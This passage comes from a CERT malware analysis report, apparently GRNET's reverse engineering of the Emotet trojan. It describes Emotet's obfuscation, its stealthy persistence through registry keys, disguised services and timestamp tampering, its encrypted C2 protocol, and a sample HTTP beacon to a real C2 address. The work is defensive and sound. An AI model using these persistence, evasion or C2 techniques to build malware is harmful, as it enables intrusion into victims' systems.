function exist in the executable: one that decrypts the ciphertext to an ASCII string and\r\none to a byte array. Luckily, all are compatible with each other as ciphertexts are processed as 32-bit integers.\r\nOnly their output types differ.\r\nWe implemented a tool to decrypt any string or byte array in the executable. The source code can be found in\r\ndecrypt_bytes.py.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 35 of 51\n\n$ ./decrypt_bytes.py nested-payload-2.exe 0xb9f0\r\nshlwapi.dll\r\nControl Flow Obfuscation\r\nWe continued our analysis with function FUN_0406860() , the first function that the entry-point calls, and\r\nobserved some kind of control flow obfuscation. Specifically, the function’s body is split into multiple if\r\nblocks, wrapped in a while loop. The flow is determined by a control variable that is set at the end of each\r\nblock. Furthermore, as seen from the function graph below, the majority of the blocks have the same predecessor\r\nand successor blocks. This technique resembles the Control Flow Flattening technique, in which each function is\r\nsplit into basic blocks that are encapsulated in a switch block wrapped in a while loop.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 36 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 37 of 51\n\nFigure 31. Emotet trojan’s Control Flow Obfuscation\r\nThis technique is also applied to the vast majority of the functions in the executable.\r\nWe were aware of techniques to automatically de-obfuscate control flow flattening (e.g. the technique described in\r\nthis quarkslab blog post), but since the size of the code was small enough we decided to follow the flow manually.\r\nChapter 4. The trojan’s internals\r\nIntroduction\r\nIn the previous chapter we had a look at the trojan executable. We identified several obfuscation techniques\r\nincorporated in the executable and described the methods we used to overcome them. In this chapter, we will\r\ndiscuss the trojan’s inner functionalities.\r\nMain flow overview\r\nWe followed a depth-first approach to reverse engineer the executable. We started from the function\r\nFUN_0406860() , the one called by the executable’s entry-point, which we called “main”.\r\nFigure 32. Emotet trojan’s entry-point\r\nThen, we followed the flow examining each function call. We did this until we reached a function that either made\r\nno further calls or only invoked already examined functions. After a couple of weeks we had completely studied\r\nthe executable’s code.\r\nAs a result, we were able to draw the code flow of the main function in a meaningful manner. Below, we present\r\nthe main control loop of the trojan:\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 38 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 39 of 51\n\nFigure 33. Emotet trojan’s main function flow chart\r\nThe basic groups of states are highlighted:\r\nGrey states: Initialization of internal variables.\r\nPurple states: Persistence-related operations (running during the first run of the trojan or after\r\ncommunicating with the C2 network).\r\nGreen states: Initialization of parameters related to the communication with the C2 network.\r\nBlue states: Initialization of static data to be included in requests to the C2 network.\r\nOrange states: Re-initialization of variable data to be included in the next request to the C2 network.\r\nRed states: Communication with the chosen C2 server.\r\nYellow state: Handling of the C2 server’s response.\r\nInitially, the trojan loads the required libraries (states 1 and 2) and initializes its internal variables (state 3).\r\nThen, it checks whether it will run with command line arguments or not (state 4). The existence of command line\r\narguments indicates that this is the first run of a self-update. The command line arguments contain the file path\r\nwhere the executable will have to migrate to. In that case, states 8-13 perform a series of actions related to the\r\npersistence of the trojan. Specifically, any existing file in the target file-path is renamed (state 8), the current\r\nexecutable is stored in the target file-path and its Zone Identifier ADS is removed (state 9). The created file is\r\nmarked as “old” by changing its timestamps (state 10). If the process runs with administrative permissions, a new\r\nService for the executable is created (state 11). Then, it waits until it receives a signal from its parent process (state\r\n12). Finally, it runs itself from the newly created executable (state 13).\r\nIn case that command line arguments are absent it’s either the first run after the Protector extracted the trojan or\r\nit’s any later run. This is inferred by checking the executable’s timestamp (state 5). In case it’s indeed a first-run,\r\nany existing Services for the executable are removed provided that the executable has administrative permissions\r\n(state 6), and then a random legitimate-looking file-path is picked as the target for the executable file (state 7).\r\nThen, states 8-13 run performing the series of actions described earlier.\r\nIn case it not a first-run (indicated by a “recent” timestamp) and the trojan runs with administrative permissions, it\r\nchecks whether its parent process name is “ services.exe ” (state 14). If so, it runs itself in a new process (state\r\n13) and terminates the current process.\r\nFinally, if this is not the first run (indicated by an “old” timestamp), and the trojan runs without administrative\r\nrights or its parent process name is not “ services.exe “, the C2 communication flow happens. First, a new\r\nthread that monitors the changes of the current process’ executable filename is started (state 15). Then the control\r\nreaches state 16 and always returns to it until the current process’ executable filename changes. That will be the\r\nresult of a self-update and after that, the trojan will wait for any threads to terminate (state 39) and then will\r\nterminate its process.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 40 of 51\n\nWhile no changes of the filename are detected, the trojan will repeatedly communicate with C2. First, the C2\r\ncommunication parameters are initialized once (states 17-20). Furthermore, the request data regarding the host\r\nsystem information are also initialized once (states 21-26). On each communication attempt, the list of the\r\nprocesses currently running on the system as well as the list of active payload IDs will be included in the request\r\n(states 27-28). Then the actual communication with C2 is performed (states 29-31). Upon a successful\r\ncommunication the trojan will first check if a termination flag was received. In that case it will immediately move\r\nits executable to the Temp folder and terminate itself (state 38). Otherwise, any existing files in the folder\r\ncontaining the trojan’s executable are deleted and a new auto-run Registry Key is created (state 32). Then, the\r\ntrojan will loop over the received payloads and execute them (state 33).\r\nOn the rest of the chapter we will focus on two main functionalities of the trojan, the persistence mechanisms and\r\nthe communication with the Command-and-Control servers.\r\nPersistence mechanisms\r\nTo identify its first run, the trojan should either run with command line arguments, or the LastWriteTime of its\r\nexecutable file needs to be less than 8 days old. The timestamp is retrieved by calling\r\nGetFileInformationByHandleEx() on the handle returned by GetModuleFileNameW() .\r\nUpon its first run, the trojan places its executable file in a sub-folder inside one of the following Windows Special\r\nFolders:\r\nCSIDL_LOCAL_APPDATA (usually C:\\Users\\username\\AppData\\Local ) if the trojan runs without\r\nadministrator rights, or\r\nCSIDL_SYSTEMX86 (usually C:\\Windows\\SysWOW64 ) if the trojan runs with administrator rights.\r\nThe names given to sub-folder names and the filename of the malware, depend on whether the executable did run\r\nwith command line arguments or not:\r\nWith no command line parameters, the malware chooses two random files from the legitimate executable\r\n(.exe) and library (.dll) files contained in the CSIDL_SYSTEM (usually C:\\Windows\\System32 ) folder. The\r\nnames of these randomly chosen files are used to define the name of the sub-folder that the malware will be\r\nstored in, as well as the filename that the trojan will be stored with inside this sub-folder.\r\nWhen invoked with command line parameters, the sub-folder name and filename for the malware are\r\nparsed from the base64-encoded command line argument. The structure of the base64-decoded command\r\nline argument is described in detail in the Responses from C2 section.\r\nFurthermore, it deletes the corresponding Zone.Identifier Alternate Data Stream (which is added by the web\r\nclient to mark files downloaded from external sites as possibly unsafe to run).\r\nFinally, all the timestamp attributes of the file ( CreationTime, LastAccessTime, LastWriteTime and\r\nChangeTime ) are set to 8 days in the past. In this way, the next time the malware runs, will be aware that it is not\r\nthe first time.\r\nTo achieve persistence, two different methods are used:\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 41 of 51\n\n1. Registry Key: Upon receiving a C2 response, it creates a sub-key of\r\nthe  HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry key. The sub-key type\r\nis String ( REG_SZ , 0x1 ), its name is the filename of the trojan and the Value is the full path inside the\r\nWindows Special Folder.\r\n2. System Service: Upon its first run, if running with administrator rights it creates a new Service. The\r\nService type is SERVICE_WIN32_OWN_PROCESS ( 0x10 ) and its binary path is the full path inside the\r\nWindows Special Folder. Once the service is created it picks a random legitimate service from the list\r\nreturned by  EnumServicesStatusExW() and copies its description on the malicious service, using\r\nQueryServiceConfig2W() and ChangeServiceConfig2W() respectievely, making it difficult to distinguish\r\nfrom legitimate services.\r\nCommand-and-Control\r\nAfter achieving persistence, the trojan tries to communicate with one of the Command and Control (C2) servers to\r\ninform it about the compromised system and retrieve the payloads to execute. Emotet’s C2 network consists of\r\nmultiple C2 servers with different C2 servers having different up-times, achieving redundancy and lowering the\r\nprobability of detection. In total, we identified 126 unique C2 servers spread all over the world, mainly located in\r\nEurope, the Americas and south-east Asia:\r\nFigure 34. Emotet’s Command-and-Control server locations\r\nThe trojan binaries come with the list of IPv4 addresses and ports of all C2 servers embedded. The C2 servers are\r\ntried sequentially, until one responds successfully. On the first run, the trojan starts from the first C2 server of the\r\nlist. On all subsequent runs, it continues from the last C2 server that responded successfully. We again wrote a\r\nshort script to automatically extract the IPv4 addresses and ports from the binaries, which can be found in\r\nextract_c2_socket_addresses.py. Finally, all C2 servers share a common private key which is used for protecting\r\nthe communication between the trojan and the C2 server. The public key is also embedded in the trojan binaries,\r\nalbeit encrypted.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 42 of 51\n\nData exchange between the trojan and the C2 server utilizes a complex serialization and deserialization\r\nmechanism, which includes compression and encryption of both the request and response data. The actual\r\ncommunication takes place over plain HTTP, presumably to evade protections based on flagged TLS certificates.\r\nDuring the trojan’s initialization phase, the C2’s RSA-768 public key is decrypted (using the decryption function\r\ndescribed in the previous chapter) and a random AES-128 session key is generated (using the Windows Crypto\r\nAPI). The public key is used to encrypt the session key and verify the response and the session key to encrypt the\r\nrequest and decrypt the response. The encrypted session key is included in the request so that the C2 server can\r\ndecrypt the request payload. Finally, SHA-1 is used for hashing.\r\nThe primitive data types used in the exchanged messages are the byte , the char and the uint (32-bit). The\r\nnon-primitive data types are struct Bytes and struct String , as shown in the following code snippet:\r\nstruct Bytes {\r\n byte *buffer;\r\n uint size;\r\n};\r\n \r\nstruct String {\r\n char *buffer;\r\n uint length;\r\n};\r\nAll primitive data types are serialized in little-endian byte order. A  struct Bytes is serialized to the size of the\r\nbuffer followed by the actual bytes of the buffer. A struct String is serialized to the length of the string\r\nfollowed by the characters of the string, excluding the null terminator.\r\nRequest Payload\r\nThe trojan uses information gathered from the compromised system to assemble the request payload. This\r\nincludes information that can be used to uniquely identify the system, information about the operating system and\r\nthe running processes as well as the current state of the trojan itself. Upon analyzing the binary, we concluded that\r\nthe structure of the request payload as used internally by the trojan is the following:\r\nstruct RequestPayload {\r\n struct String systemId;\r\n uint systemInfo;\r\n uint rdpSessionId;\r\n uint date;\r\n uint value_1000;\r\n struct String otherProcessExecutableNames;\r\n struct Bytes payloadIds;\r\n uint currentProcessExecutablePathHash;\r\n};\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 43 of 51\n\nThe request payload struct is serialized to the serialized request payload by serializing and concatenating its fields\r\nin the order they appear, as shown in the image below.\r\nFigure 35. Emotet’s serialized request payload\r\nsystemId\r\nThe ID assigned to the compromised system. It is constructed using the format string %s_%08X , where the first\r\nspecifier corresponds to the computer name and the second specifier to the volume serial number of the disk\r\npartition where Windows are installed. To get the computer name, GetComputerNameA() is used. To get the\r\nvolume serial number, GetWindowsDirectoryW() is used to get the drive letter of the partition where Windows are\r\ninstalled and then GetVolumeInformationW() is utilized to get the volume serial number of that partition. Non-letter and non-digit characters in the computer name are replaced by the character X . For example, for the\r\ncompromised system with computer name DESKTOP-K1C601 and volume serial number  B4A6-FEC6 the value of\r\nsystemId would be DESKTOPXK1C601_B4A6FEC6 .\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 44 of 51\n\nsystemInfo\r\nA numeric value that encodes information regarding the OS and the architecture of the compromised system. The\r\ntrojan uses RtlGetVersion() and  GetNativeSystemInfo() to get the OSVERSIONINFOEXW and SYSTEM_INFO\r\nstructures, respectively. The numeric value is constructed as shown below:\r\nOSVERSIONINFOEXW.wProductType * 100000 + OSVERSIONINFOEXW.dwMajorVersion * 1000 + OSVERSIONINFOEXW.dwMinorVersi\r\nFor example, the systemInfo value of 110009 means that the operating system is Windows 10 and the\r\nprocessor architecture is x64:\r\nwProductType : 1 ( VER_NT_WORKSTATION )\r\ndwMajorVersion : 10\r\ndwMinorVersion : 0\r\nwProcessorArchitecture : 9 ( PROCESSOR_ARCHITECTURE_AMD64 )\r\nrdpSessionId\r\nThe Remote Desktop Services session under which the current process is running. The trojan uses\r\nGetCurrentProcessId() to get the current process ID and ProcessIdToSessionId() to convert the process ID\r\nto the RDP session ID.\r\ndate\r\nThe value  20200416 is hardcoded in the request payload, which can presumably be decoded to the date April 16,\r\n2020. This could be the date that the current campaign started, however this cannot be confirmed.\r\nvalue_1000\r\nThe value 1000 is hardcoded in the request payload. Its purpose is unknown.\r\notherProcessExecutableNames\r\nA comma-separated list of the names of all processes running in the system, except for the current and the parent\r\nprocesses. The trojan uses CreateToolhelp32Snapshot() to take a snapshot of all processes in the system and\r\nProcess32FirstW() / Process32NextW() to iterate over them. The current and the parent processes are filtered\r\nout. For example:\r\nSearchFilterHost.exe,SearchProtocolHost.exe,Taskmgr.exe,conhost.exe,PowerShell.exe,notepad.exe,dllhost.exe,...\r\npayloadIds\r\nThe IDs of the payloads received from the C2 server that are currently running. To support this functionality, the\r\nC2 server assigns an ID to every payload and the trojan maintains an in-memory list of the active payloads. Using\r\nthis value, the C2 server is informed about the payloads that are currently running. The list of IDs is represented as\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 45 of 51\n\nan array of unsigned integers. For example, if the payloads with IDs 2643 , 2647 , and 2759 are currently\r\nrunning, the value of payloadIds would be:\r\n53 0a 00 00 57 0a 00 00 c7 0a 00 00\r\ncurrentProcessExecutablePathHash\r\nThe hash of the full path of the current process’ executable, lower-cased. The trojan uses GetModuleFileNameW()\r\nto get the path and a custom hash function to hash the path, the reverse engineered version of which can be found\r\nin hashLowercase.c. For example, if the path of the trojan’s executable was\r\nC:\\Users\\IEUser\\AppData\\Local\\dxdiag\\reg.exe , the hash value would be 0x9f955b9 .\r\nRequest\r\nThe request encapsulates the request payload described before as well as the request flags. The request flags are\r\nused to specify the type of the request payload.\r\nstruct Request {\r\n uint flags;\r\n struct Bytes compressedPayload;\r\n};\r\nBefore serializing the request struct, the serialized request payload is compressed using a LZ77-style algorithm,\r\nforming the compressed request payload. The request struct’s fields are serialized in the order they appear to form\r\nthe serialized request, following again the aforementioned serialization rules.\r\nFinally, the session key is encrypted with the C2 servers’ public key (96 bytes), the serialized request is hashed (20\r\nbytes) and then encrypted with the session key to form the encrypted request. The encrypted session key, the\r\nrequest hash and the encrypted request form the request body. This is illustrated in the following image.\r\nFigure 36. Emotet’s encrypted request\r\nHTTP request-response\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 46 of 51\n\nThe trojan communicates with the C2 server over plain HTTP, using the WinINet API. In preparation of the\r\ncommunication, the trojan generates a random URL path, a random boundary for the multipart/form-data body\r\nand random field and file names for the form part to be submitted. Various headers (e.g. the Accept header) are\r\nhardcoded, while others (e.g. the User-Agent header) are system-dependent. Following is a sample HTTP request\r\nsent by the trojan to a C2 server:\r\nGET /3QDtL0eyVn/macjAF9/ HTTP/1.1\r\nHost: 46.101.58.37:8080\r\nCache-Control: no-cache\r\nUpgrade-Insecure-Requests: 1\r\nReferer: 46.101.58.37/\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)\r\nDNT: 1\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=---------------gby5HOqeZpTWuWuQV0Pq0e\r\nContent-Length: 5090\r\n \r\n-----------------gby5HOqeZpTWuWuQV0Pq0e\r\nContent-Disposition: form-data; name=\"iopq\"; filename=\"yyexctg\"\r\nContent-Type: application/octet-stream\r\n \r\n\u003cencrypted session key || serialized request hash || encrypted request\u003e\r\n-----------------gby5HOqeZpTWuWuQV0Pq0e--\r\nAnd the corresponding HTTP response:\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Tue, 05 Jan 2021 18:09:55 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 87076\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\n \r\n\u003ccompressed response signature || compressed response hash || encrypted response\u003e\r\nResponse\r\nJust like the request body, the response body consists of three parts, the compressed response’s signature, the\r\ncompressed response’s hash and the encrypted response. The signature is generated by the C2 servers’ private key\r\nand the compressed response is encrypted using the session key submitted to the C2 server as part of the request.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 47 of 51\n\nFigure 37. Emotet’s encrypted response\r\nUpon decrypting the encrypted response, the trojan retrieves a uint representing the decompressed response size\r\nfollowed by the compressed response, which can be decompressed to the serialized response using the same\r\nLZ77-style algorithm that was used to compress the request. Finally, the serialized response can be deserialized to\r\nthe following struct, adhering again to the common serialization rules.\r\nstruct Response {\r\n struct Bytes serializedPayload;\r\n uint flags;\r\n};\r\nThe response flags are used to inform the trojan whether to continue or terminate its operation after executing the\r\npayload.\r\nResponse Payload\r\nThe serialized response payload is a series of serialized struct Bytes , each of which contains a serialized\r\nresponse payload struct.\r\nstruct ResponsePayload {\r\n uint payloadId;\r\n uint payloadType;\r\n struct Bytes payload;\r\n};\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 48 of 51\n\nFigure 38. Emotet’s serialized response payload\r\npayloadId\r\nEvery payload has a unique ID. As discussed in the subsection about the request payload, this is used to keep track\r\nof the payloads that are being executed by each compromised system. Payload IDs are incremental integers.\r\npayloadType\r\nEach received payload is handled based on the payloadType property. There are 4 payload types:\r\nType 1 ( 0x1 ): the payload is an executable (.exe) and it is written to a file which is executed in a new\r\nprocess, using CreateProcessW() .\r\nType 2 ( 0x2 ): the payload is an executable (.exe) and it is written to a file which is is executed in a new\r\nlocal user process, using CreateProcessAsUserW() .\r\nType 3 ( 0x3 ): the payload is a dynamic-link library (.dll), it is loaded into the address space of the trojan’s\r\nprocess by a custom loader (similar to those discussed in previous chapters) and then its entrypoint is\r\ncalled in a new thread, using CreateThread() .\r\nType 4 ( 0x4 ): the payload is an executable (.exe) and it is written to a file which is executed in a new\r\nprocess, using CreateProcessW() , with command line arguments.\r\nFor types 1, 2 and 4, the file is stored the same directory where the executable of the trojan resides. Its filename is\r\ngenerated by concatenating the name without the extension of a random .exe or .dll file in the CSIDL_SYSTEM\r\n( C:\\Windows\\System32 ) directory, the payload ID in a hexadecimal format ( %x ) and the “ .exe ” extension.\r\nFor type 3, the entry-point is called with a non-standard reason ( 10 ) and the reserved argument is a pointer to a\r\nstruct with the system ID and the C2 servers’ public key in DER format, as shown below.\r\nstruct DllArgs {\r\n char *systemId;\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 49 of 51\n\nstruct Bytes c2PublicKeyDer;\r\n};\r\nFor type 4, the executable is called with a single command line argument, which is a base64-encoded serialized\r\nstruct with a handle to the calling process and the parent directory and name of the calling process’ executable, as\r\nshown below. This type is used for updating Emotet to newer versions.\r\nstruct CmdLineArgs {\r\n HANDLE *hProcess;\r\n WCHAR *directoryAndFilenameWithoutExtension;\r\n DWORD directoryAndFilenameWithoutExtensionLength;\r\n}\r\npayload\r\nThe actual data of the payload.\r\nChapter 5. Monitoring the updates\r\nIntroduction\r\nIn the previous chapter we thoroughly described the internals of the trojan. Having a good understanding of the\r\ncommunication protocol between the trojan and the C2 network we could now communicate with any C2 server,\r\nposing as an instance of the trojan. In this final chapter we show the custom client that we developed in order to\r\ncommunicate with the C2 servers with arbitrary requests and describe the responses that we received.\r\nFurthermore, we briefly describe how we used the Ghidra Scripting API in order to automate repeated processes\r\nof reverse-engineering which proved to be helpful for extracting useful information out of the received update\r\npayloads (e.g. new IP addresses of the C2 network).\r\nDeveloping a custom “Emotet” client\r\nWe have already described the communication between the trojan instances and the C2 network, including the\r\ndetection of the C2 servers, the structure of the requests and responses as well as the compression and encryption\r\nalgorithms. Based on this analysis we could develop our own Emotet client, which allowed us to perform requests\r\nwith arbitrary request payloads. Like the rest of the scripts, the client was implemented in Python. The source\r\ncode can be found in client.py. Using this client, we could monitor the uptime of each of the listed C2 servers and\r\nparse the C2 responses.\r\nMost of the C2 responses were loadable DLL extensions to the trojan (type 3). The payloads received from\r\ndifferent C2 servers at the same point in time were identical or almost identical, differing only in the first 48 bytes\r\nof the read-only data section. Some of the payloads were obfuscated using variations of the techniques described\r\nin Chapter 3, while others were not. The only update (type 4) that we received during our analysis was Europol’s\r\nclean-up client.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 50 of 51\n\nFrom the collected statistics, only a fraction of the C2 servers were online at each time. The set of active C2\r\nservers was changing over time, pressumably to avoid triggering alerts and being detected.\r\nAutomating repeated reverse-engineering processes\r\nOn each received payload we had to repeat the processes that we followed to overcome the incorporated\r\nobfuscation techniques. Since these techniques were slightly different for each payload (e.g. different XOR keys\r\nwere used, algorithm constants were modified, variables were stored in different memory addresses, etc.) we had\r\nto develop some pieces of code implementing some basic logic. We used the Ghidra scripting API and developed\r\nPython scripts that automated repeated process that required considerable manual effort. Specifically, the two\r\nmain processes that were automated are the decryption of the strings and the resolution of the imported symbols.\r\nThese basic automations made the analysis of the received updates significantly easier. Implementation of the\r\nalgorithms can also be found in decrypt_bytes.py and generate_symbol_hashes2.py.\r\nEpilogue\r\nIn this analysis we documented our defensive strategy against a large trojan-spreading campaign. Our approach\r\nwas based on static analysis and reverse engineering. We initially avoided running any of the trojan’s stages. This\r\nwas an intentional choice because with dynamic analysis certain conditions and corner cases could not have been\r\ntriggered and whole code paths could have been skipped. After many hours of reverse engineering and building\r\nenough confidence that we had a full understanding of the trojan’s inner workings, we used dynamic\r\ninstrumentation to confirm our observations. For the latter we used the Frida dynamic instrumentation toolkit.\r\nNevertheless, as shown by our work, the dynamic analysis of a malware is not always required in order to\r\nundestand and analyze its functionality.\r\nNotice that in this analysis we only focused on analyzing the trojan itself and intentionally skipped the analysis of\r\npayloads spread by the C2 network. From the analysis of the trojan’s internals in Chapter 4, it became apparent\r\nthat Emotet enables the C2 servers to run arbitrary payloads on infected computers. It is known that Emotet had\r\nbeen used in order to spread banking-related malware, e-mail harvesting malware, as well as ransomware.\r\nHowever, analyzing those payloads was considered out of the scope of planning a generic defense against Emotet.\r\nFinally, we did not include any analysis of the last payload that our update-monitoring infrastructure received,\r\nwhich according to our observations and combined with public reports is Europol’s clean-up payload.\r\nWe hope that IT Security professionals will find our work useful for defending against similar malware in the\r\nfuture.\r\nSource: https://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 51 of 51",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cert.grnet.gr/en/blog/reverse-engineering-emotet/"
	],
	"report_names": [
		"reverse-engineering-emotet"
	],
	"threat_actors": [],
	"ts_created_at": 1775434398,
	"ts_updated_at": 1775791297,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/075b2620cdc687cb3b82d4eb438c3f3a9a97667d.pdf",
		"text": "https://archive.orkl.eu/075b2620cdc687cb3b82d4eb438c3f3a9a97667d.txt",
		"img": "https://archive.orkl.eu/075b2620cdc687cb3b82d4eb438c3f3a9a97667d.jpg"
	}
}